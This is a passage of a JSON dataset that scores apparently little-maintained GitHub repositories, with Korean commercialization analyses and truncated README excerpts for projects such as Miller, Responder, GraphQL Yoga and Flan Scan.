[视觉和语言(Vision-Langua","composite_score":0.2256,"license_safety_tag":"unknown"},{"name":"odpi/OpenDS4All","github_url":"https://github.com/odpi/OpenDS4All","stars":7,"language":"HTML","license":"Apache-2.0","abandonment_months":11,"description":"# OpenDS4All 저장소 분석\n\n## 왜 보물인가\n데이터 과학을 배우고 싶어 하는 모든 사람들을 위해 무료로 교육 자료를 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 데이터 분석 입문자를 위한 유료 강의 콘텐츠로 패키징하여 판매\n2. **기업 교육 솔루션**: 대기업의 임직원 데이터 리터러시 교육 프로","readme_excerpt":"![](https://github.com/odpi/artwork/blob/master/projects/opends4all/odpiopends4all-color.svg)\n\n![GitHub](https://img.shields.io/github/license/odpi/opends4all)\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/odpi/OpenDS4All/binder?filepath=opends4all-resources%2F)\n\n# Success Story - One-of-a-Kind Workshop to University of Liverpool Students\n\n[Bootcamp-style OpenDS4All workshop where students could enhance their theoretical knowledge with hands-on, industry-focused experience.](https://www.ibm.com/cloud/blog/expert-labs-offers-one-of-a-kind-workshop-to-university-of-liverpool-students)\n\n\n# Description\n\nOpenDS4All is a project created to accelerate the creation of data science curricula at academic institutions. While a great deal of online material is available for data science, **including** online courses, we recognize that the **best** way for many students to learn (and for many institutions to deliver) content is through a combination of lectures, recit","composite_score":0.2251,"license_safety_tag":"safe"},{"name":"4GeeksAcademy/flask-rest-hello","github_url":"https://github.com/4GeeksAcademy/flask-rest-hello","stars":135,"language":"Python","license":"NOASSERTION","abandonment_months":7,"description":"","readme_excerpt":"","composite_score":0.225,"license_safety_tag":"unknown"},{"name":"basemate/matestack-ui-core","github_url":"https://github.com/basemate/matestack-ui-core","stars":5,"language":"Ruby","license":"MIT","abandonment_months":2,"description":"# Matestack UI Core 상품화 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 기본 부품들을 미리 준비해둔 도구 모음으로, 개발자들이 처음부터 만드는 번거로움을 덜어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 관리 시스템(ERP, CRM)의 기본 화면 구성을 빠르게 구축하는 솔루션으로 제공\n2. **내부 업무 ","readme_excerpt":"[![Specs](https://github.com/matestack/matestack-ui-core/workflows/specs/badge.svg)](https://github.com/matestack/matestack-ui-core/actions)\n[![Discord](https://img.shields.io/discord/771413294136426496.svg)](https://discord.com/invite/c6tQxFG)\n[![Gem Version](https://badge.fury.io/rb/matestack-ui-core.svg)](https://badge.fury.io/rb/matestack-ui-core)\n[![Docs](https://img.shields.io/badge/docs-matestack-blue.svg)](https://docs.matestack.io)\n[![Twitter Follow](https://img.shields.io/twitter/follow/matestack.svg?style=social)](https://twitter.com/matestack)\n\n![matestack logo](./logo.png)\n\n# matestack-ui-core | Component based web UIs in pure Ruby for Rails\n\nBoost your productivity & easily create component based web UIs in pure Ruby.\n\n`matestack-ui-core` enables you to craft maintainable web UIs in pure Ruby, skipping ERB and HTML. UI code becomes a native and fun part of your Rails app. `matestack-ui-core` can progressively replace the classic Rails-View-Layer. You are able to use\nit al","composite_score":0.2248,"license_safety_tag":"safe"},{"name":"jakobrunge/tigramite","github_url":"https://github.com/jakobrunge/tigramite","stars":8,"language":"Jupyter Notebook","license":"gpl-3.0","abandonment_months":4,"description":"","readme_excerpt":"# Tigramite – Causal inference for time series datasets\n![logo](docs/_images/tigramite_logo_header.png)\nVersion 5.2\n(Python Package)\n\n[Github](https://github.com/jakobrunge/tigramite.git)\n\n[Documentation](https://jakobrunge.github.io/tigramite/)\n\n[Tutorials](https://github.com/jakobrunge/tigramite/tree/master/tutorials/)\n\n## Overview\n\nIt's best to start with our [Overview/review paper: Causal inference for time series](https://github.com/jakobrunge/tigramite/blob/master/tutorials/Runge_Causal_Inference_for_Time_Series_NREE.pdf)\n\n__Update:__ Tigramite now has a new CausalEffects class that allows to estimate (conditional) causal effects and mediation based on assuming a causal graph. Have a look at the tutorial.\n\nFurther, Tigramite provides several causal discovery methods that can be used under different sets of assumptions. An application always consists of a method and a chosen conditional independence test, e.g. PCMCIplus together with ParCorr. The following two tables give an overv","composite_score":0.2248,"license_safety_tag":"restricted"},{"name":"concourse/examples","github_url":"https://github.com/concourse/examples","stars":31,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.2247,"license_safety_tag":"safe"},{"name":"baianat/vee-validate","github_url":"https://github.com/baianat/vee-validate","stars":7,"language":"TypeScript","license":"mit","abandonment_months":3,"description":"# Vee-Validate 상용화 분석\n\n## 왜 보물인가\n온라인 양식(입력 폼)의 정확성을 자동으로 검증해주는 도구로, 웹서비스의 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원가입, 결제 정보 입력 시 실시간으로 입력 오류를 알려주는 폼 검증 플랫폼\n- **내부 업무 도구**: 기업의 데이터 입력 ","readme_excerpt":"<p align=\"center\">\r\n  <a href=\"https://vee-validate.logaretm.com\" target=\"_blank\">\r\n    <img src=\"https://raw.githubusercontent.com/logaretm/vee-validate/main/logo.png\" width=\"200\" title=\"Go to website\">\r\n  </a>\r\n</p>\r\n\r\n<p align=\"center\">\r\nPainless Vue forms\r\n</p>\r\n\r\n<p align=\"center\">\r\n\r\n<a target=\"_blank\" href=\"https://www.npmjs.com/package/vee-validate\">\r\n  <img src=\"https://img.shields.io/npm/v/vee-validate.svg?label=&color=05bda8\">\r\n</a>\r\n\r\n<a target=\"_blank\" href=\"https://npm-stat.com/charts.html?package=vee-validate\">\r\n  <img src=\"https://img.shields.io/npm/dm/vee-validate.svg?color=05bd6d&label=\">\r\n</a>\r\n\r\n<a href=\"https://vee-validate.logaretm.com/v5/\" target=\"_blank\">\r\n  <img src=\"https://img.shields.io/badge/-docs%20and%20demos-009f53\">\r\n</a>\r\n\r\n<a href=\"https://github.com/sponsors/logaretm\">\r\n  <img src=\"https://img.shields.io/badge/-%E2%99%A5%20Sponsors-ec5cc6\">\r\n\r\n</a>\r\n\r\n</p>\r\n\r\n<br>\r\n\r\n<p align=\"center\">\r\n  <a href=\"https://github.com/sponsors/logaretm\">\r\n    <img src=","composite_score":0.2242,"license_safety_tag":"safe"},{"name":"johnkerl/miller","github_url":"https://github.com/johnkerl/miller","stars":26,"language":"Go","license":"NOASSERTION","abandonment_months":0,"description":"# Miller 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 파일들을 간단하게 정렬, 필터링, 변환할 수 있는 범용 도구로, 엑셀처럼 사용하지만 더 강력한 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업 고객들이 월간 보고서 데이터를 자동으로 정제하고 요약하는 클라우드 서비스\n2. **내부 업무 도구**: 은행/보험","readme_excerpt":"# What is Miller?\n\n**Miller is like awk, sed, cut, join, and sort for data formats such as CSV, TSV, JSON, JSON Lines, and positionally-indexed.**\n\n# What can Miller do for me?\n\nWith Miller, you get to use named fields without needing to count positional\nindices, using familiar formats such as CSV, TSV, JSON, JSON Lines, and\npositionally-indexed.  Then, on the fly, you can add new fields which are\nfunctions of existing fields, drop fields, sort, aggregate statistically,\npretty-print, and more.\n\n![cover-art](./docs/src/coverart/cover-combined.png)\n\n* Miller operates on **key-value-pair data** while the familiar\nUnix tools operate on integer-indexed fields: if the natural data structure for\nthe latter is the array, then Miller's natural data structure is the\ninsertion-ordered hash map.\n\n* Miller handles a **variety of data formats**,\nincluding but not limited to the familiar **CSV**, **TSV**, and **JSON**/**JSON Lines**.\n(Miller can handle **positionally-indexed data** too!)\n\nIn the abov","composite_score":0.2242,"license_safety_tag":"unknown"},{"name":"kennethreitz/responder","github_url":"https://github.com/kennethreitz/responder","stars":27,"language":"Python","license":"Apache-2.0","abandonment_months":1,"description":"# Responder 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 개발자들이 더 빠르고 쉽게 작업할 수 있도록 돕는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 업무 관리 플랫폼의 백엔드 구축\n2. **내부 업무 도구**: 회사 직원들이 사용하는 데이터 조회/입력 시스템\n3. **API 판매**: 다른 기","readme_excerpt":"# Responder\n\nA familiar HTTP Service Framework for Python, powered by [Starlette](https://www.starlette.io/).\n\n```python\nimport responder\n\napi = responder.API()\n\n@api.route(\"/{greeting}\")\nasync def greet_world(req, resp, *, greeting):\n    resp.text = f\"{greeting}, world!\"\n\nif __name__ == \"__main__\":\n    api.run()\n```\n\n    $ pip install responder\n\nThat's it. Supports Python 3.10+.\n\n## The Basics\n\n- `resp.text` sends back text. `resp.html` sends back HTML. `resp.content` sends back bytes.\n- `resp.media` sends back JSON (or YAML, with content negotiation).\n- `resp.file(\"path.pdf\")` serves a file with automatic content-type detection.\n- `req.headers` is case-insensitive. `req.params` gives you query parameters.\n- Both sync and async views work — the `async` is optional.\n\n## Highlights\n\n```python\n# Type-safe route parameters\n@api.route(\"/users/{user_id:int}\")\nasync def get_user(req, resp, *, user_id):\n    resp.media = {\"id\": user_id}\n\n# HTTP method filtering\n@api.route(\"/items\", methods=[\"P","composite_score":0.224,"license_safety_tag":"safe"},{"name":"outflanknl/RedELK","github_url":"https://github.com/outflanknl/RedELK","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":1,"description":"# RedELK 저장소 분석\n\n## 왜 보물인가\n보안 위협을 감시하는 조직들이 해킹 공격을 실시간으로 탐지하고 추적할 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 보안팀을 위한 웹 기반 위협 모니터링 플랫폼으로 운영\n2. **내부 업무 도구**: 대규모 조직의 IT 보안팀이 자체 서버에 설치하여 공격 감지","readme_excerpt":"[![Build docker base image (dev)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-base.yml/badge.svg)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-base.yml)\n[![Build docker elasticsearch image (dev)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-elasticsearch.yml/badge.svg?branch=develop)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-elasticsearch.yml)\n[![Build docker jupyter image (dev)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-jupyter.yml/badge.svg?branch=develop)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-jupyter.yml)\n[![Build docker kibana image (dev)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-kibana.yml/badge.svg?branch=develop)](https://github.com/outflanknl/RedELK/actions/workflows/docker-build-dev-kibana.yml)\n[![Build docker logstash image (dev)](https://github.com/outflanknl/RedELK/ac","composite_score":0.224,"license_safety_tag":"safe"},{"name":"databricks/learning-spark","github_url":"https://github.com/databricks/learning-spark","stars":5,"language":"Java","license":"mit","abandonment_months":11,"description":"# Databricks Learning Spark 분석 보고서\n\n## 왜 보물인가\n대규모 데이터를 빠르게 처리하는 기술을 누구나 배울 수 있는 무료 교재로, 데이터 분석 분야의 진입장벽을 낮춰주는 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 교육 SaaS**\n- 기업 직원 대상 온라인 교육 플랫폼으로 구독 판매\n- 실습 환경과 함께 제공하","readme_excerpt":"[![buildstatus](https://travis-ci.org/holdenk/learning-spark-examples.svg?branch=master)](https://travis-ci.org/holdenk/learning-spark-examples)\nExamples for Learning Spark\n===============\nExamples for the Learning Spark book. These examples require a number of libraries and as such have long build files. We have also added a stand alone example with minimal dependencies and a small build file\nin the mini-complete-example directory.\n\n\nThese examples have been updated to run against Spark 1.3 so they may\nbe slightly different than the versions in your copy of \"Learning Spark\".\n\nRequirements\n==\n* JDK 1.7 or higher\n* Scala 2.10.3\n- scala-lang.org\n* Spark 1.3\n* Protobuf compiler\n- On debian you can install with sudo apt-get install protobuf-compiler\n* R & the CRAN package Imap are required for the ChapterSixExample\n* The Python examples require urllib3\n\nPython examples\n===\n\nFrom spark just run ./bin/pyspark ./src/python/[example]\n\nSpark Submit\n===\n\nYou can also create an assembly jar with ","composite_score":0.2239,"license_safety_tag":"safe"},{"name":"paritytech/ss58-registry","github_url":"https://github.com/paritytech/ss58-registry","stars":59,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.2239,"license_safety_tag":"safe"},{"name":"graphcool/graphql-yoga","github_url":"https://github.com/graphcool/graphql-yoga","stars":14,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# GraphQL Yoga 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 데이터를 효율적으로 주고받는 시스템을 쉽게 만들 수 있게 해주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 기반 프로젝트 관리 플랫폼의 데이터 처리 백엔드로 활용\n2. **내부 업무 도구**: 직원 정보, 급여, 휴가 관리 시스템의 데이터","readme_excerpt":"<div align=\"center\"><img src=\"https://raw.githubusercontent.com/graphql-hive/graphql-yoga/refs/heads/main/website/public/cover.png\" width=\"720\" /></div>\n\n<div align=\"center\">\n  <h3>GraphQL Yoga</h3>\n  <h6>Fully-featured GraphQL Server with focus on easy setup, performance & great developer experience</h6>\n  <a href=\"https://www.the-guild.dev/graphql/yoga-server/docs\"><b>Go to documentation</b></a>\n</div>\n\n<br />\n\n<div align=\"center\">\n\n![npm](https://badgen.net/npm/v/graphql-yoga)\n![bundlephobia minified size](https://badgen.net/bundlephobia/min/graphql-yoga)\n![bundlephobia minified+zipped size](https://badgen.net/bundlephobia/minzip/graphql-yoga)\n![bundlephobia treeshaking](https://badgen.net/bundlephobia/tree-shaking/graphql-yoga)\n![license](https://badgen.net/github/license/graphql-hive/graphql-yoga)\n\n</div>\n\n## Quick start\n\n### Install\n\n```sh\npnpm add graphql-yoga graphql\n```\n\n### Start\n\nMake a schema, create Yoga and start a Node server:\n\n```ts\nimport { createServer } from 'node:ht","composite_score":0.2238,"license_safety_tag":"safe"},{"name":"unisat-wallet/fractal-ordinals-collections","github_url":"https://github.com/unisat-wallet/fractal-ordinals-collections","stars":30,"language":"Rust","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.2237,"license_safety_tag":"safe"},{"name":"prisma/graphql-yoga","github_url":"https://github.com/prisma/graphql-yoga","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# GraphQL Yoga 프로젝트 분석\n\n## 왜 보물인가\n인기 있는 웹 개발 회사인 Prisma가 만든 API 구축 도구로, 개발자들이 손쉽게 데이터 교환 시스템을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱·웹 서비스 개발 회사에서 자신의 데이터베이스와 사용자 앱을 연결하는 중간 다리 역할\n- **내부 업","readme_excerpt":"<div align=\"center\"><img src=\"https://raw.githubusercontent.com/graphql-hive/graphql-yoga/refs/heads/main/website/public/cover.png\" width=\"720\" /></div>\n\n<div align=\"center\">\n  <h3>GraphQL Yoga</h3>\n  <h6>Fully-featured GraphQL Server with focus on easy setup, performance & great developer experience</h6>\n  <a href=\"https://www.the-guild.dev/graphql/yoga-server/docs\"><b>Go to documentation</b></a>\n</div>\n\n<br />\n\n<div align=\"center\">\n\n![npm](https://badgen.net/npm/v/graphql-yoga)\n![bundlephobia minified size](https://badgen.net/bundlephobia/min/graphql-yoga)\n![bundlephobia minified+zipped size](https://badgen.net/bundlephobia/minzip/graphql-yoga)\n![bundlephobia treeshaking](https://badgen.net/bundlephobia/tree-shaking/graphql-yoga)\n![license](https://badgen.net/github/license/graphql-hive/graphql-yoga)\n\n</div>\n\n## Quick start\n\n### Install\n\n```sh\npnpm add graphql-yoga graphql\n```\n\n### Start\n\nMake a schema, create Yoga and start a Node server:\n\n```ts\nimport { createServer } from 'node:ht","composite_score":0.2236,"license_safety_tag":"safe"},{"name":"19PDP/Bilibili-plus","github_url":"https://github.com/19PDP/Bilibili-plus","stars":5,"language":"C++","license":"unknown","abandonment_months":9,"description":"# Bilibili-plus 상용화 분석\n\n## 왜 보물인가\n빌리빌리(중국 동영상 플랫폼)의 기능을 확장하고 사용자 경험을 개선하는 도구로, 동영상 크리에이터와 매니아 사용자들이 강하게 원하는 니즈를 충족시킵니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 동영상 다운로드, 자막 추출, 재생 품질 향상 기능을 구독 기반으로 제공\n- **내부 업","readme_excerpt":"### 2022年1月11日更新\n\n侯捷C++系列视频：\n1. 阿里云盘：[侯捷全系列](https://www.aliyundrive.com/s/d3WQCUgj1L2)；\n\n2. 蓝奏云也放了一份：[PPT 和代码](https://fishe.lanzoul.com/s/cpp)；\n\n3. 有很多同学问视频学习顺序，最先学 面向对象上、下和 STL 标准库，之后其他的视频自己就有把握了；\n\n4. 视频并不完整，缺少的部分：\n\n   - STL部分：p25是重复了p23的，这里**缺少p25**的视频；p27就是p28的开头，但**这里没有缺失**，课程内容是连贯的，应该是原视频没剪辑好。\n\n   - C++新标准部分：p29前面的都是完整的，主要是最后几个课时缺少了p30、32、33、35、36（下图圈出部分）\n\n     ![C++11&14缺失部分](./images/lack.png)\n\n   - 除了这些，全系列其他视频应该都是完整的。\n\n\n\n# 侯捷 C++ 系列\n\n### C++ 面向对象高级编程(上)\n\n+ :tv: [视频](https://www.bilibili.com/video/BV1Lb4y1R7fs)\n+ :page_facing_up: [源代码和课件](./C++-OOPBase1-HouJie/)\n\n### C++ 面向对象高级编程(下)-兼谈对象模型\n\n+ :tv: [视频](https://www.bilibili.com/video/BV1ZX4y157Bu)\n+ :page_facing_up:  [源代码和课件](C++-OOPBase2-HouJie/)\n\n### C++标准库(STL)与泛型编程\n\n+ :tv: [视频](https://www.bilibili.com/video/BV1BX4y1G7bX)\n+ :page_facing_up:  [源代码和课件](./C++-STL-HouJie)\n\n### C++新标准-C++11&14\n\n+ :tv: [视频](https://www.bilibili.com/video/BV1Rp4y1n7fb)\n+ :page_facing_up:  [课件](./C++-newC++11&14-HouJie)\n\n### C++内存管理机制-从平地到万丈高楼\n\n+ ","composite_score":0.2233,"license_safety_tag":"unknown"},{"name":"Microsoft/api-guidelines","github_url":"https://github.com/Microsoft/api-guidelines","stars":7,"language":"","license":"NOASSERTION","abandonment_months":10,"description":"# Microsoft/api-guidelines 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 API 설계 가이드북으로, 회사 규모와 상관없이 누구나 안전하고 일관된 소프트웨어 인터페이스를 만들 수 있는 실전 지침입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 새로운 데이터 연동 API를 출시할 때 가이드를 참고하여 개발자 친화적인 인터","readme_excerpt":"# Microsoft REST API Guidelines\nThank you for your interest in the Microsoft REST API Guidelines. If you have landed here, you're probably interested in learning about APIs. If so, you are in the right place!\nWe publish these guidelines here with the aim of fostering dialogue and learning in the API community at large. We further hope that these guidelines might encourage other organizations to create guidelines that are appropriate for them and in turn, if they're able, to publish theirs.\n\n### Guidance for Azure service teams\nAzure service teams should reference the companion documents, [Azure REST API Guidelines](./azure/Guidelines.md) and [Considerations for Service Design](./azure/ConsiderationsForServiceDesign.md), when building or modifying their services. These documents provide a refined set of guidance targeted specifically for Azure services. For more information, please refer to the [README](./azure/README.md) in the Azure folder.\n\n### Guidance for Microsoft Graph service te","composite_score":0.2231,"license_safety_tag":"unknown"},{"name":"YunYouJun/air-conditioner","github_url":"https://github.com/YunYouJun/air-conditioner","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":10,"description":"# Air-Conditioner 저장소 분석\n\n## 왜 보물인가\n에어컨이나 난방기를 자동으로 제어하는 스마트홈 기술로, 에너지 낭비를 줄이면서 쾌적한 실내 환경을 유지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 스마트홈 관리 서비스**\n원격으로 에어컨을 켜고 끌 수 있는 구독형 앱 서비스를 운영하며, 월별 요금을 청구합니다.\n\n**2. 건물 관리","readme_excerpt":"<h1 align=\"center\">\nAir Conditioner\n</h1>\n\n<p align=\"center\">\n<a href=\"https://github.com/YunYouJun/air-conditioner/actions\" target=\"_blank\">\n<img src=\"https://github.com/YunYouJun/air-conditioner/workflows/Github%20Pages/badge.svg\" alt=\"GitHub Pages\" />\n</a>\n</p>\n\n<p align=\"center\">\n中文文档 | <a href=\"./README.en.md\">English Docs</a>\n</p>\n\n<p align=\"center\">\n\n[云空调](https://ac.yunyoujun.cn)，便携小空调，为你的夏日带去清凉！\n\n</p>\n<br>\n\n> 前世今生：[云空调，便携小空调｜云游君的小站](https://www.yunyoujun.cn/posts/air-conditioner/)\n\n| 仓库 | 类型 | 链接 |\n| --- | --- | --- |\n| 裸机 | main | [ac.yunyoujun.cn](https://ac.yunyoujun.cn) |\n| 测试机 | dev | [ac.yyj.moe](https://ac.yyj.moe) |\n| 样板房 | 空调房 | [https://www.yunyoujun.cn/air-conditioner-room/](https://www.yunyoujun.cn/air-conditioner-room/) |\n\n## Features\n\n### 优势\n\n- 🕐 随时随地打开空调\n- 📱 便携\n- 🔋 低功耗（使用 HTML CSS 而非 Canvas 绘制）\n- 🔊 静音\n- 🎮 操作简单\n- 🔧 安装便捷\n\n### 劣势\n\n- 💨 没有风\n\n## 安装\n\n### iframe\n\n```html\n<iframe height=\"740\" src=\"https://ac.yunyoujun.cn\"></iframe>\n```\n\n您可以快速为您的网站安装空调。\n\n样板房：[空调房](https:/","composite_score":0.223,"license_safety_tag":"safe"},{"name":"dedupeio/dedupe","github_url":"https://github.com/dedupeio/dedupe","stars":7,"language":"Python","license":"mit","abandonment_months":10,"description":"# dedupeio/dedupe 상용화 분석\n\n## 왜 보물인가\n중복된 데이터를 자동으로 찾아서 정리해주는 기술로, 데이터 품질 관리가 필요한 모든 기업에서 필수적으로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 정보 관리 시스템(CRM)에 내장하여 같은 고객이 중복 등록되는 것을 자동 감지 및 통합\n2. **내부 ","readme_excerpt":"# Dedupe Python Library\n\n[![Tests Passing](https://github.com/dedupeio/dedupe/workflows/tests/badge.svg)](https://github.com/dedupeio/dedupe/actions?query=workflow%3Atests)[![codecov](https://codecov.io/gh/dedupeio/dedupe/branch/main/graph/badge.svg?token=aauKUrTEgh)](https://codecov.io/gh/dedupeio/dedupe)\n\n_dedupe is a python library that uses machine learning to perform fuzzy matching, deduplication and entity resolution quickly on structured data._\n\n__dedupe__ will help you: \n\n* __remove duplicate entries__ from a spreadsheet of names and addresses\n* __link a list__ with customer information to another with order history, even without unique customer IDs\n* take a database of campaign contributions and __figure out which ones were made by the same person__, even if the names were entered slightly differently for each record\n\ndedupe takes in human training data and comes up with the best rules for your dataset to quickly and automatically find similar records, even with very large dat","composite_score":0.2229,"license_safety_tag":"safe"},{"name":"github/linguist","github_url":"https://github.com/github/linguist","stars":12,"language":"Ruby","license":"mit","abandonment_months":0,"description":"# github/linguist 상용화 분석\n\n## 왜 보물인가\n코드 파일의 프로그래밍 언어를 자동으로 인식하는 기술로, 개발자 도구와 코드 분석 플랫폼의 핵심 기반이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **코드 품질 검사 SaaS**: 회사의 소스코드를 업로드하면 언어별로 자동 분류하여 보안 취약점을 찾아주는 웹 서비스\n2. **기업 내부","readme_excerpt":"# Linguist\n\n[![Actions Status](https://github.com/github/linguist/workflows/Run%20Tests/badge.svg)](https://github.com/github/linguist/actions) \n\n[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/github-linguist/linguist)\n\nThis library is used on GitHub.com to detect blob languages, ignore binary or vendored files, suppress generated files in diffs, and generate language breakdown graphs.\n\n## Documentation\n\n- [How Linguist works](/docs/how-linguist-works.md)\n- [Change Linguist's behaviour with overrides](/docs/overrides.md)\n- [Troubleshooting](/docs/troubleshooting.md)\n- [Contributing guidelines](CONTRIBUTING.md)\n\n## Installation\n\nInstall the gem:\n\n```bash\ngem install github-linguist\n```\n\n### Dependencies\n\nLinguist is a Ruby library so you will need a recent version of Ruby installed.\nThere are known problems with the macOS/Xcode supplied version of Ruby that causes problems installing some of the dependencies.\nAccordingly, we highly recomme","composite_score":0.2228,"license_safety_tag":"safe"},{"name":"cloudflare/flan","github_url":"https://github.com/cloudflare/flan","stars":54,"language":"Python","license":"BSD-3-Clause","abandonment_months":1,"description":"","readme_excerpt":"<img src=\"https://cfsecuritycdn.infosec.workers.dev/img/flan_scan.png\"/>\n\nFlan Scan is a lightweight network vulnerability scanner. With Flan Scan you can easily find open ports on your network, identify services and their version, and get a list of relevant CVEs affecting your network.\n\nFlan Scan is a wrapper over Nmap and the vulners script which turns Nmap into a full-fledged network vulnerability scanner. Flan Scan makes it easy to deploy Nmap locally within a container, push results to the cloud, and deploy the scanner on Kubernetes.\n\n\nGetting Started\n------\n1. Clone this repository\n\n2. Make sure you have docker setup:\n```bash\n$ docker --version\n```\n\n3. Add the list of IP addresses or CIDRS you wish to scan to `shared/ips.txt`.\n\n4. Build the container:\n```bash\n$ make build\n```\n\n5. Start scanning!\n```bash\n$ make start\n```\nBy default flan creates Latex reports, to get other formats run:\n```\n$ make html\n```\nAdditional supported formats are *md* (markdown), *html* and *json*.\n\nWhen th","composite_score":0.2228,"license_safety_tag":"safe"},{"name":"gomods/athens","github_url":"https://github.com/gomods/athens","stars":5,"language":"Go","license":"MIT","abandonment_months":0,"description":"# Athens 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발에 필요한 외부 코드 모음을 안전하게 관리하고 공유할 수 있는 중앙 집중식 저장소입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n여러 팀이 공유하는 코드 라이브러리 관리 플랫폼으로, 회사 규모의 개발팀들이 동일한 도구를 사용하도록 제공\n\n**2. 내부 업무 도구**\n대형 IT회","readme_excerpt":"# Welcome To Athens, Gophers!\n\n![Athens Banner](./docs/static/banner.png)\n\n[![Build Status](https://github.com/gomods/athens/actions/workflows/ci.yml/badge.svg)](https://github.com/gomods/athens/actions/workflows/ci.yml?query=branch%3Amain)\n[![GoDoc](https://godoc.org/github.com/gomods/athens?status.svg)](https://godoc.org/github.com/gomods/athens)\n[![Go Report Card](https://goreportcard.com/badge/github.com/gomods/athens)](https://goreportcard.com/report/github.com/gomods/athens)\n[![codecov](https://codecov.io/gh/gomods/athens/branch/master/graph/badge.svg)](https://codecov.io/gh/gomods/athens)\n[![Docker Pulls](https://img.shields.io/docker/pulls/gomods/athens.svg?maxAge=604800)](https://hub.docker.com/r/gomods/athens/)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](http://makeapullrequest.com)\n[![Open Source Helpers](https://www.codetriage.com/gomods/athens/badges/users.svg)](https://www.codetriage.com/gomods/athens)\n\nWelcome to the Athens project! Athens ","composite_score":0.2228,"license_safety_tag":"safe"},{"name":"jtr13/d3book","github_url":"https://github.com/jtr13/d3book","stars":6,"language":"HTML","license":"unknown","abandonment_months":18,"description":"# jtr13/d3book 평가 보고서\n\n## 왜 보물인가\n데이터를 시각적으로 예쁘게 표현하는 방법을 배울 수 있는 실용적인 교육 자료로, 숫자와 통계를 이해하기 쉬운 차트와 그래프로 변환하는 기술을 다룹니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 교육 SaaS**\n기업 직원들을 대상으로 \"데이터 시각화 기초\" 온라인 교과 과정을 구독 형태로 ","readme_excerpt":"![bookdown](https://github.com/jtr13/d3book/workflows/bookdown/badge.svg)\n\nThis repo contains the source code for [D3 for R Users](https://jtr13.github.io/d3book), replaces [https://www.github.com/jtr13/d3](https://www.github.com/jtr13/d3).\n\n\nThe book was made with [**bookdown**](https://bookdown.org/).\n","composite_score":0.2226,"license_safety_tag":"unknown"},{"name":"BretFisher/udemy-docker-mastery","github_url":"https://github.com/BretFisher/udemy-docker-mastery","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# BretFisher/udemy-docker-mastery 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 배포 과정을 단순화하는 '도커'라는 기술을 체계적으로 배우고 가르칠 수 있는 완성된 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유데미(Udemy) 같은 강의 판매 사이트에서 도커 학습 코스로 월 $10~30에 판매 가능","readme_excerpt":"# Udemy Course Docker Mastery: with Kubernetes+Swarm from a Docker Captain\n\n[![](https://dcbadge.limes.pink/api/server/devops)](https://discord.gg/devops)\n\n> Build, test, and deploy containers with the best mega-course on Docker, Kubernetes, Compose, Swarm and Registry using a cloud native DevOps mindset\n\nThis repository is for use in my Udemy Courses \"[Docker Mastery](https://www.udemy.com/course/docker-mastery/?referralCode=1410924A733D33635CCB\n)\" and \"[Swarm Mastery](https://www.udemy.com/course/docker-swarm-mastery/?referralCode=4927D9CB156D4AE0228C)\"\n\n- Get these courses with my \"cheapest on the internet\" coupon links: [bretfisher.com/courses](https://www.bretfisher.com/courses)\n- Get the [weekly newsletter](https://www.bretfisher.com/newsletter) on all the cloud native DevOps content I'm creating.\n\n## Course Sections\n\n1. Quick Start!\n   1. [README](./intro/README.md)\n   2. [Commands and Links](./references/S01%20Commands%20and%20Links.md)\n2. Course Introduction\n3. The Best Way to","composite_score":0.2226,"license_safety_tag":"safe"},{"name":"cdimascio/generator-express-no-stress","github_url":"https://github.com/cdimascio/generator-express-no-stress","stars":19,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# generator-express-no-stress 상용화 분석\n\n## 왜 보물인가\n복잡한 웹 서버를 간단하게 만들어주는 